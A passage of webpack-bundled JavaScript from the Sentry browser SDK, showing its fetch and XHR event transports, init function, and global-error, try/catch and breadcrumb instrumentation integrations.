            message: message,
        };
        if (this._options.attachStacktrace && hint && hint.syntheticException) {
            var stacktrace = Object(__WEBPACK_IMPORTED_MODULE_5__tracekit__["a" /* _computeStackTrace */])(hint.syntheticException);
            var frames_1 = Object(__WEBPACK_IMPORTED_MODULE_4__parsers__["d" /* prepareFramesForEvent */])(stacktrace.stack);
            event.stacktrace = {
                frames: frames_1,
            };
        }
        return __WEBPACK_IMPORTED_MODULE_3__sentry_utils__["c" /* SyncPromise */].resolve(event);
    };
    return BrowserBackend;
}(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["b" /* BaseBackend */]));

//# sourceMappingURL=backend.js.map

/***/ }),
/* 3234 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FetchTransport; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_types__ = __webpack_require__(285);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__base__ = __webpack_require__(772);




var global = Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["i" /* getGlobalObject */])();
/** `fetch` based transport */
var FetchTransport = /** @class */ (function (_super) {
    __WEBPACK_IMPORTED_MODULE_0_tslib__["c" /* __extends */](FetchTransport, _super);
    function FetchTransport() {
        return _super !== null && _super.apply(this, arguments) || this;
    }
    /**
     * @inheritDoc
     */
    FetchTransport.prototype.sendEvent = function (event) {
        var defaultOptions = {
            body: JSON.stringify(event),
            method: 'POST',
            // Despite all stars in the sky saying that Edge supports old draft syntax, aka 'never', 'always', 'origin' and 'default
            // https://caniuse.com/#feat=referrer-policy
            // It doesn't. And it throw exception instead of ignoring this parameter...
            // REF: https://github.com/getsentry/raven-js/issues/1233
            referrerPolicy: (Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["B" /* supportsReferrerPolicy */])() ? 'origin' : ''),
        };
        return this._buffer.add(global.fetch(this.url, defaultOptions).then(function (response) { return ({
            status: __WEBPACK_IMPORTED_MODULE_1__sentry_types__["b" /* Status */].fromHttpCode(response.status),
        }); }));
    };
    return FetchTransport;
}(__WEBPACK_IMPORTED_MODULE_3__base__["a" /* BaseTransport */]));

//# sourceMappingURL=fetch.js.map

/***/ }),
/* 3235 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return XHRTransport; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_types__ = __webpack_require__(285);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__base__ = __webpack_require__(772);



/** `XHR` based transport */
var XHRTransport = /** @class */ (function (_super) {
    __WEBPACK_IMPORTED_MODULE_0_tslib__["c" /* __extends */](XHRTransport, _super);
    function XHRTransport() {
        return _super !== null && _super.apply(this, arguments) || this;
    }
    /**
     * @inheritDoc
     */
    XHRTransport.prototype.sendEvent = function (event) {
        var _this = this;
        return this._buffer.add(new Promise(function (resolve, reject) {
            var request = new XMLHttpRequest();
            request.onreadystatechange = function () {
                if (request.readyState !== 4) {
                    return;
                }
                if (request.status === 200) {
                    resolve({
                        status: __WEBPACK_IMPORTED_MODULE_1__sentry_types__["b" /* Status */].fromHttpCode(request.status),
                    });
                }
                reject(request);
            };
            request.open('POST', _this.url);
            request.send(JSON.stringify(event));
        }));
    };
    return XHRTransport;
}(__WEBPACK_IMPORTED_MODULE_2__base__["a" /* BaseTransport */]));

//# sourceMappingURL=xhr.js.map

/***/ }),
/* 3236 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export defaultIntegrations */
/* harmony export (immutable) */ __webpack_exports__["a"] = init;
/* unused harmony export showReportDialog */
/* unused harmony export lastEventId */
/* unused harmony export forceLoad */
/* unused harmony export onLoad */
/* unused harmony export flush */
/* unused harmony export close */
/* unused harmony export wrap */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__client__ = __webpack_require__(1426);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__helpers__ = __webpack_require__(516);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__integrations__ = __webpack_require__(1429);





var defaultIntegrations = [
    new __WEBPACK_IMPORTED_MODULE_0__sentry_core__["d" /* Integrations */].InboundFilters(),
    new __WEBPACK_IMPORTED_MODULE_0__sentry_core__["d" /* Integrations */].FunctionToString(),
    new __WEBPACK_IMPORTED_MODULE_4__integrations__["TryCatch"](),
    new __WEBPACK_IMPORTED_MODULE_4__integrations__["Breadcrumbs"](),
    new __WEBPACK_IMPORTED_MODULE_4__integrations__["GlobalHandlers"](),
    new __WEBPACK_IMPORTED_MODULE_4__integrations__["LinkedErrors"](),
    new __WEBPACK_IMPORTED_MODULE_4__integrations__["UserAgent"](),
];
/**
 * The Sentry Browser SDK Client.
 *
 * To use this SDK, call the {@link init} function as early as possible when
 * loading the web page. To set context information or send manual events, use
 * the provided methods.
 *
 * @example
 *
 * ```
 *
 * import { init } from '@sentry/browser';
 *
 * init({
 *   dsn: '__DSN__',
 *   // ...
 * });
 * ```
 *
 * @example
 * ```
 *
 * import { configureScope } from '@sentry/browser';
 * configureScope((scope: Scope) => {
 *   scope.setExtra({ battery: 0.7 });
 *   scope.setTag({ user_mode: 'admin' });
 *   scope.setUser({ id: '4711' });
 * });
 * ```
 *
 * @example
 * ```
 *
 * import { addBreadcrumb } from '@sentry/browser';
 * addBreadcrumb({
 *   message: 'My Breadcrumb',
 *   // ...
 * });
 * ```
 *
 * @example
 *
 * ```
 *
 * import * as Sentry from '@sentry/browser';
 * Sentry.captureMessage('Hello, world!');
 * Sentry.captureException(new Error('Good bye'));
 * Sentry.captureEvent({
 *   message: 'Manual',
 *   stacktrace: [
 *     // ...
 *   ],
 * });
 * ```
 *
 * @see {@link BrowserOptions} for documentation on configuration options.
 */
function init(options) {
    if (options === void 0) { options = {}; }
    if (options.defaultIntegrations === undefined) {
        options.defaultIntegrations = defaultIntegrations;
    }
    if (options.release === undefined) {
        var window_1 = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["i" /* getGlobalObject */])();
        // This supports the variable that sentry-webpack-plugin injects
        if (window_1.SENTRY_RELEASE && window_1.SENTRY_RELEASE.id) {
            options.release = window_1.SENTRY_RELEASE.id;
        }
    }
    Object(__WEBPACK_IMPORTED_MODULE_0__sentry_core__["i" /* initAndBind */])(__WEBPACK_IMPORTED_MODULE_2__client__["a" /* BrowserClient */], options);
}
/**
 * Present the user with a report dialog.
 *
 * @param options Everything is optional, we try to fetch all info need from the global scope.
 */
function showReportDialog(options) {
    if (options === void 0) { options = {}; }
    if (!options.eventId) {
        options.eventId = Object(__WEBPACK_IMPORTED_MODULE_0__sentry_core__["h" /* getCurrentHub */])().lastEventId();
    }
    var client = Object(__WEBPACK_IMPORTED_MODULE_0__sentry_core__["h" /* getCurrentHub */])().getClient();
    if (client) {
        client.showReportDialog(options);
    }
}
/**
 * This is the getter for lastEventId.
 *
 * @returns The last event id of a captured event.
 */
function lastEventId() {
    return Object(__WEBPACK_IMPORTED_MODULE_0__sentry_core__["h" /* getCurrentHub */])().lastEventId();
}
/**
 * This function is here to be API compatible with the loader.
 * @hidden
 */
function forceLoad() {
    // Noop
}
/**
 * This function is here to be API compatible with the loader.
 * @hidden
 */
function onLoad(callback) {
    callback();
}
/**
 * A promise that resolves when all current events have been sent.
 * If you provide a timeout and the queue takes longer to drain the promise returns false.
 *
 * @param timeout Maximum time in ms the client should wait.
 */
function flush(timeout) {
    var client = Object(__WEBPACK_IMPORTED_MODULE_0__sentry_core__["h" /* getCurrentHub */])().getClient();
    if (client) {
        return client.flush(timeout);
    }
    return Promise.reject(false);
}
/**
 * A promise that resolves when all current events have been sent.
 * If you provide a timeout and the queue takes longer to drain the promise returns false.
 *
 * @param timeout Maximum time in ms the client should wait.
 */
function close(timeout) {
    var client = Object(__WEBPACK_IMPORTED_MODULE_0__sentry_core__["h" /* getCurrentHub */])().getClient();
    if (client) {
        return client.close(timeout);
    }
    return Promise.reject(false);
}
/**
 * Wrap code within a try/catch block so the SDK is able to capture errors.
 *
 * @param fn A function to wrap.
 */
function wrap(fn) {
    // tslint:disable-next-line: no-unsafe-any
    Object(__WEBPACK_IMPORTED_MODULE_3__helpers__["d" /* wrap */])(fn)();
}
//# sourceMappingURL=sdk.js.map

/***/ }),
/* 3237 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return GlobalHandlers; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__helpers__ = __webpack_require__(516);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__parsers__ = __webpack_require__(771);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__tracekit__ = __webpack_require__(515);






/** Global handlers */
var GlobalHandlers = /** @class */ (function () {
    /** JSDoc */
    function GlobalHandlers(options) {
        /**
         * @inheritDoc
         */
        this.name = GlobalHandlers.id;
        this._options = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({ onerror: true, onunhandledrejection: true }, options);
    }
    /**
     * @inheritDoc
     */
    GlobalHandlers.prototype.setupOnce = function () {
        Error.stackTraceLimit = 50;
        Object(__WEBPACK_IMPORTED_MODULE_5__tracekit__["d" /* _subscribe */])(function (stack, _, error) {
            // TODO: use stack.context to get a valuable information from TraceKit, eg.
            // [
            //   0: "  })"
            //   1: ""
            //   2: "  function foo () {"
            //   3: "    Sentry.captureException('some error')"
            //   4: "    Sentry.captureMessage('some message')"
            //   5: "    throw 'foo'"
            //   6: "  }"
            //   7: ""
            //   8: "  function bar () {"
            //   9: "    foo();"
            //   10: "  }"
            // ]
            if (Object(__WEBPACK_IMPORTED_MODULE_3__helpers__["c" /* shouldIgnoreOnError */])()) {
                return;
            }
            var self = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().getIntegration(GlobalHandlers);
            if (self) {
                Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().captureEvent(self._eventFromGlobalHandler(stack), {
                    data: { stack: stack },
                    originalException: error,
                });
            }
        });
        if (this._options.onerror) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].log('Global Handler attached: onerror');
            Object(__WEBPACK_IMPORTED_MODULE_5__tracekit__["b" /* _installGlobalHandler */])();
        }
        if (this._options.onunhandledrejection) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].log('Global Handler attached: onunhandledrejection');
            Object(__WEBPACK_IMPORTED_MODULE_5__tracekit__["c" /* _installGlobalUnhandledRejectionHandler */])();
        }
    };
    /**
     * This function creates an Event from an TraceKitStackTrace.
     *
     * @param stacktrace TraceKitStackTrace to be converted to an Event.
     */
    GlobalHandlers.prototype._eventFromGlobalHandler = function (stacktrace) {
        if (!Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["q" /* isString */])(stacktrace.message) && stacktrace.mechanism !== 'onunhandledrejection') {
            // There are cases where stacktrace.message is an Event object
            // https://github.com/getsentry/sentry-javascript/issues/1949
            // In this specific case we try to extract stacktrace.message.error.message
            var message = stacktrace.message;
            stacktrace.message =
                message.error && Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["q" /* isString */])(message.error.message) ? message.error.message : 'No error message';
        }
        var event = Object(__WEBPACK_IMPORTED_MODULE_4__parsers__["b" /* eventFromStacktrace */])(stacktrace);
        var data = {
            mode: stacktrace.mode,
        };
        if (stacktrace.message) {
            data.message = stacktrace.message;
        }
        if (stacktrace.name) {
            data.name = stacktrace.name;
        }
        var client = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().getClient();
        var maxValueLength = (client && client.getOptions().maxValueLength) || 250;
        var fallbackValue = stacktrace.original
            ? Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["C" /* truncate */])(JSON.stringify(Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["u" /* normalize */])(stacktrace.original)), maxValueLength)
            : '';
        var fallbackType = stacktrace.mechanism === 'onunhandledrejection' ? 'UnhandledRejection' : 'Error';
        // This makes sure we have type/value in every exception
        Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["d" /* addExceptionTypeValue */])(event, fallbackValue, fallbackType, {
            data: data,
            handled: false,
            type: stacktrace.mechanism,
        });
        return event;
    };
    /**
     * @inheritDoc
     */
    GlobalHandlers.id = 'GlobalHandlers';
    return GlobalHandlers;
}());

//# sourceMappingURL=globalhandlers.js.map

/***/ }),
/* 3238 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return TryCatch; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__helpers__ = __webpack_require__(516);


/** Wrap timer functions and event targets to catch errors and provide better meta data */
var TryCatch = /** @class */ (function () {
    function TryCatch() {
        /** JSDoc */
        this._ignoreOnError = 0;
        /**
         * @inheritDoc
         */
        this.name = TryCatch.id;
    }
    /** JSDoc */
    TryCatch.prototype._wrapTimeFunction = function (original) {
        return function () {
            var args = [];
            for (var _i = 0; _i < arguments.length; _i++) {
                args[_i] = arguments[_i];
            }
            var originalCallback = args[0];
            args[0] = Object(__WEBPACK_IMPORTED_MODULE_1__helpers__["d" /* wrap */])(originalCallback, {
                mechanism: {
                    data: { function: getFunctionName(original) },
                    handled: true,
                    type: 'instrument',
                },
            });
            return original.apply(this, args);
        };
    };
    /** JSDoc */
    TryCatch.prototype._wrapRAF = function (original) {
        return function (callback) {
            return original(Object(__WEBPACK_IMPORTED_MODULE_1__helpers__["d" /* wrap */])(callback, {
                mechanism: {
                    data: {
                        function: 'requestAnimationFrame',
                        handler: getFunctionName(original),
                    },
                    handled: true,
                    type: 'instrument',
                },
            }));
        };
    };
    /** JSDoc */
    TryCatch.prototype._wrapEventTarget = function (target) {
        var global = Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["i" /* getGlobalObject */])();
        var proto = global[target] && global[target].prototype;
        if (!proto || !proto.hasOwnProperty || !proto.hasOwnProperty('addEventListener')) {
            return;
        }
        Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["g" /* fill */])(proto, 'addEventListener', function (original) {
            return function (eventName, fn, options) {
                try {
                    // tslint:disable-next-line:no-unbound-method strict-type-predicates
                    if (typeof fn.handleEvent === 'function') {
                        fn.handleEvent = Object(__WEBPACK_IMPORTED_MODULE_1__helpers__["d" /* wrap */])(fn.handleEvent.bind(fn), {
                            mechanism: {
                                data: {
                                    function: 'handleEvent',
                                    handler: getFunctionName(fn),
                                    target: target,
                                },
                                handled: true,
                                type: 'instrument',
                            },
                        });
                    }
                }
                catch (err) {
                    // can sometimes get 'Permission denied to access property "handle Event'
                }
                return original.call(this, eventName, Object(__WEBPACK_IMPORTED_MODULE_1__helpers__["d" /* wrap */])(fn, {
                    mechanism: {
                        data: {
                            function: 'addEventListener',
                            handler: getFunctionName(fn),
                            target: target,
                        },
                        handled: true,
                        type: 'instrument',
                    },
                }), options);
            };
        });
        Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["g" /* fill */])(proto, 'removeEventListener', function (original) {
            return function (eventName, fn, options) {
                var callback = fn;
                try {
                    callback = callback && (callback.__sentry_wrapped__ || callback);
                }
                catch (e) {
                    // ignore, accessing __sentry_wrapped__ will throw in some Selenium environments
                }
                return original.call(this, eventName, callback, options);
            };
        });
    };
    /**
     * Wrap timer functions and event targets to catch errors
     * and provide better metadata.
     */
    TryCatch.prototype.setupOnce = function () {
        this._ignoreOnError = this._ignoreOnError;
        var global = Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["i" /* getGlobalObject */])();
        Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["g" /* fill */])(global, 'setTimeout', this._wrapTimeFunction.bind(this));
        Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["g" /* fill */])(global, 'setInterval', this._wrapTimeFunction.bind(this));
        Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["g" /* fill */])(global, 'requestAnimationFrame', this._wrapRAF.bind(this));
        [
            'EventTarget',
            'Window',
            'Node',
            'ApplicationCache',
            'AudioTrackList',
            'ChannelMergerNode',
            'CryptoOperation',
            'EventSource',
            'FileReader',
            'HTMLUnknownElement',
            'IDBDatabase',
            'IDBRequest',
            'IDBTransaction',
            'KeyOperation',
            'MediaController',
            'MessagePort',
            'ModalWindow',
            'Notification',
            'SVGElementInstance',
            'Screen',
            'TextTrack',
            'TextTrackCue',
            'TextTrackList',
            'WebSocket',
            'WebSocketWorker',
            'Worker',
            'XMLHttpRequest',
            'XMLHttpRequestEventTarget',
            'XMLHttpRequestUpload',
        ].forEach(this._wrapEventTarget.bind(this));
    };
    /**
     * @inheritDoc
     */
    TryCatch.id = 'TryCatch';
    return TryCatch;
}());

/**
 * Safely extract function name from itself
 */
function getFunctionName(fn) {
    try {
        return (fn && fn.name) || '<anonymous>';
    }
    catch (e) {
        // Just accessing custom props in some Selenium environments
        // can cause a "Permission denied" exception (see raven-js#495).
        return '<anonymous>';
    }
}
//# sourceMappingURL=trycatch.js.map

/***/ }),
/* 3239 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Breadcrumbs; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_types__ = __webpack_require__(285);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__helpers__ = __webpack_require__(516);





var global = Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["i" /* getGlobalObject */])();
var lastHref;
/** Default Breadcrumbs instrumentations */
var Breadcrumbs = /** @class */ (function () {
    /**
     * @inheritDoc
     */
    function Breadcrumbs(options) {
        /**
         * @inheritDoc
         */
        this.name = Breadcrumbs.id;
        this._options = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({ console: true, dom: true, fetch: true, history: true, sentry: true, xhr: true }, options);
    }
    /** JSDoc */
    Breadcrumbs.prototype._instrumentConsole = function () {
        if (!('console' in global)) {
            return;
        }
        ['debug', 'info', 'warn', 'error', 'log', 'assert'].forEach(function (level) {
            if (!(level in global.console)) {
                return;
            }
            Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(global.console, level, function (originalConsoleLevel) {
                return function () {
                    var args = [];
                    for (var _i = 0; _i < arguments.length; _i++) {
                        args[_i] = arguments[_i];
                    }
                    var breadcrumbData = {
                        category: 'console',
                        data: {
                            extra: {
                                arguments: Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["u" /* normalize */])(args, 3),
                            },
                            logger: 'console',
                        },
                        level: __WEBPACK_IMPORTED_MODULE_2__sentry_types__["a" /* Severity */].fromString(level),
                        message: Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["x" /* safeJoin */])(args, ' '),
                    };
                    if (level === 'assert') {
                        if (args[0] === false) {
                            breadcrumbData.message = "Assertion failed: " + (Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["x" /* safeJoin */])(args.slice(1), ' ') || 'console.assert');
                            breadcrumbData.data.extra.arguments = Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["u" /* normalize */])(args.slice(1), 3);
                        }
                    }
                    Breadcrumbs.addBreadcrumb(breadcrumbData, {
                        input: args,
                        level: level,
                    });
                    // this fails for some browsers. :(
                    if (originalConsoleLevel) {
                        Function.prototype.apply.call(originalConsoleLevel, global.console, args);
                    }
                };
            });
        });
    };
    /** JSDoc */
    Breadcrumbs.prototype._instrumentDOM = function () {
        if (!('document' in global)) {
            return;
        }
        // Capture breadcrumbs from any click that is unhandled / bubbled up all the way
        // to the document. Do this before we instrument addEventListener.
        global.document.addEventListener('click', Object(__WEBPACK_IMPORTED_MODULE_4__helpers__["a" /* breadcrumbEventHandler */])('click'), false);
        global.document.addEventListener('keypress', Object(__WEBPACK_IMPORTED_MODULE_4__helpers__["b" /* keypressEventHandler */])(), false);
        // After hooking into document bubbled up click and keypresses events, we also hook into user handled click & keypresses.
        ['EventTarget', 'Node'].forEach(function (target) {
            var proto = global[target] && global[target].prototype;
            if (!proto || !proto.hasOwnProperty || !proto.hasOwnProperty('addEventListener')) {
                return;
            }
            Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(proto, 'addEventListener', function (original) {
                return function (eventName, fn, options) {
                    if (fn && fn.handleEvent) {
                        if (eventName === 'click') {
                            Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(fn, 'handleEvent', function (innerOriginal) {
                                return function (event) {
                                    Object(__WEBPACK_IMPORTED_MODULE_4__helpers__["a" /* breadcrumbEventHandler */])('click')(event);
                                    return innerOriginal.call(this, event);
                                };
                            });
                        }
                        if (eventName === 'keypress') {
                            Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(fn, 'handleEvent', function (innerOriginal) {
                                return function (event) {
                                    Object(__WEBPACK_IMPORTED_MODULE_4__helpers__["b" /* keypressEventHandler */])()(event);
                                    return innerOriginal.call(this, event);
                                };
                            });
                        }
                    }
                    else {
                        if (eventName === 'click') {
                            Object(__WEBPACK_IMPORTED_MODULE_4__helpers__["a" /* breadcrumbEventHandler */])('click', true)(this);
                        }
                        if (eventName === 'keypress') {
                            Object(__WEBPACK_IMPORTED_MODULE_4__helpers__["b" /* keypressEventHandler */])()(this);
                        }
                    }
                    return original.call(this, eventName, fn, options);
                };
            });
            Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(proto, 'removeEventListener', function (original) {
                return function (eventName, fn, options) {
                    var callback = fn;
                    try {
                        callback = callback && (callback.__sentry_wrapped__ || callback);
                    }
                    catch (e) {
                        // ignore, accessing __sentry_wrapped__ will throw in some Selenium environments
                    }
                    return original.call(this, eventName, callback, options);
                };
            });
        });
    };
    /** JSDoc */
    Breadcrumbs.prototype._instrumentFetch = function () {
        if (!Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["A" /* supportsNativeFetch */])()) {
            return;
        }
        Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(global, 'fetch', function (originalFetch) {
            return function () {
                var args = [];
                for (var _i = 0; _i < arguments.length; _i++) {
                    args[_i] = arguments[_i];
                }
                var fetchInput = args[0];
                var method = 'GET';
                var url;
                if (typeof fetchInput === 'string') {
                    url = fetchInput;
                }
                else if ('Request' in global && fetchInput instanceof Request) {
                    url = fetchInput.url;
                    if (fetchInput.method) {
                        method = fetchInput.method;
                    }
                }
                else {
                    url = String(fetchInput);
                }
                if (args[1] && args[1].method) {
                    method = args[1].method;
                }
                var client = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().getClient();
                var dsn = client && client.getDsn();
                if (dsn) {
                    var filterUrl = new __WEBPACK_IMPORTED_MODULE_1__sentry_core__["a" /* API */](dsn).getStoreEndpoint();
                    // if Sentry key appears in URL, don't capture it as a request
                    // but rather as our own 'sentry' type breadcrumb
                    if (filterUrl && url.includes(filterUrl)) {
                        if (method === 'POST' && args[1] && args[1].body) {
                            addSentryBreadcrumb(args[1].body);
                        }
                        return originalFetch.apply(global, args);
                    }
                }
                var fetchData = {
                    method: method,
                    url: url,
                };
                return originalFetch
                    .apply(global, args)
                    .then(function (response) {
                    fetchData.status_code = response.status;
                    Breadcrumbs.addBreadcrumb({
                        category: 'fetch',
                        data: fetchData,
                        type: 'http',
                    }, {
                        input: args,
                        response: response,
                    });
                    return response;
                })
                    .catch(function (error) {
                    Breadcrumbs.addBreadcrumb({
                        category: 'fetch',
                        data: fetchData,
                        level: __WEBPACK_IMPORTED_MODULE_2__sentry_types__["a" /* Severity */].Error,
                        type: 'http',
                    }, {
                        error: error,
                        input: args,
                    });
                    throw error;
                });
            };
        });
    };
    /** JSDoc */
    Breadcrumbs.prototype._instrumentHistory = function () {
        var _this = this;
        if (!Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["z" /* supportsHistory */])()) {
            return;
        }
        var captureUrlChange = function (from, to) {
            var parsedLoc = Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["w" /* parseUrl */])(global.location.href);
            var parsedTo = Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["w" /* parseUrl */])(to);
            var parsedFrom = Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["w" /* parseUrl */])(from);
            // Initial pushState doesn't provide `from` information
            if (!parsedFrom.path) {
                parsedFrom = parsedLoc;
            }
            // because onpopstate only tells you the "new" (to) value of location.href, and
            // not the previous (from) value, we need to track the value of the current URL
            // state ourselves
            lastHref = to;
            // Use only the path component of the URL if the URL matches the current
            // document (almost all the time when using pushState)
            if (parsedLoc.protocol === parsedTo.protocol && parsedLoc.host === parsedTo.host) {
                // tslint:disable-next-line:no-parameter-reassignment
                to = parsedTo.relative;
            }
            if (parsedLoc.protocol === parsedFrom.protocol && parsedLoc.host === parsedFrom.host) {
                // tslint:disable-next-line:no-parameter-reassignment
                from = parsedFrom.relative;
            }
            Breadcrumbs.addBreadcrumb({
                category: 'navigation',
                data: {
                    from: from,
                    to: to,
                },
            });
        };
        // record navigation (URL) changes
        var oldOnPopState = global.onpopstate;
        global.onpopstate = function () {
            var args = [];
            for (var _i = 0; _i < arguments.length; _i++) {
                args[_i] = arguments[_i];
            }
            var currentHref = global.location.href;
            captureUrlChange(lastHref, currentHref);
            if (oldOnPopState) {
                return oldOnPopState.apply(_this, args);
            }
        };
        /**
         * @hidden
         */
        function historyReplacementFunction(originalHistoryFunction) {
            // note history.pushState.length is 0; intentionally not declaring
            // params to preserve 0 arity
            return function () {
                var args = [];
                for (var _i = 0; _i < arguments.length; _i++) {
                    args[_i] = arguments[_i];
                }
                var url = args.length > 2 ? args[2] : undefined;
                // url argument is optional
                if (url) {
                    // coerce to string (this is what pushState does)
                    captureUrlChange(lastHref, String(url));
                }
                return originalHistoryFunction.apply(this, args);
            };
        }
        Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(global.history, 'pushState', historyReplacementFunction);
        Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(global.history, 'replaceState', historyReplacementFunction);
    };
    /** JSDoc */
    Breadcrumbs.prototype._instrumentXHR = function () {
        if (!('XMLHttpRequest' in global)) {
            return;
        }
        /**
         * @hidden
         */
        function wrapProp(prop, xhr) {
            // TODO: Fix XHR types
            if (prop in xhr && typeof xhr[prop] === 'function') {
                Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(xhr, prop, function (original) {
                    return Object(__WEBPACK_IMPORTED_MODULE_4__helpers__["d" /* wrap */])(original, {
                        mechanism: {
                            data: {
                                function: prop,
                                handler: (original && original.name) || '<anonymous>',
                            },
                            handled: true,
                            type: 'instrument',
                        },
                    });
                });
            }
        }
        var xhrproto = XMLHttpRequest.prototype;
        Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(xhrproto, 'open', function (originalOpen) {
            return function () {
                var args = [];
                for (var _i = 0; _i < arguments.length; _i++) {
                    args[_i] = arguments[_i];
                }
                var url = args[1];
                this.__sentry_xhr__ = {
                    method: args[0],
                    url: args[1],
                };
                var client = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().getClient();
                var dsn = client && client.getDsn();
                if (dsn) {
                    var filterUrl = new __WEBPACK_IMPORTED_MODULE_1__sentry_core__["a" /* API */](dsn).getStoreEndpoint();
                    // if Sentry key appears in URL, don't capture it as a request
                    // but rather as our own 'sentry' type breadcrumb
                    if (Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["q" /* isString */])(url) && (filterUrl && url.includes(filterUrl))) {
                        this.__sentry_own_request__ = true;
                    }
                }
                return originalOpen.apply(this, args);
            };
        });
        Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(xhrproto, 'send', function (originalSend) {
            return function () {
                var args = [];
                for (var _i = 0; _i < arguments.length; _i++) {
                    args[_i] = arguments[_i];
                }
                var xhr = this; // tslint:disable-line:no-this-assignment
                if (xhr.__sentry_own_request__) {
                    addSentryBreadcrumb(args[0]);
                }
                /**
                 * @hidden
                 */
                function onreadystatechangeHandler() {
                    if (xhr.readyState === 4) {
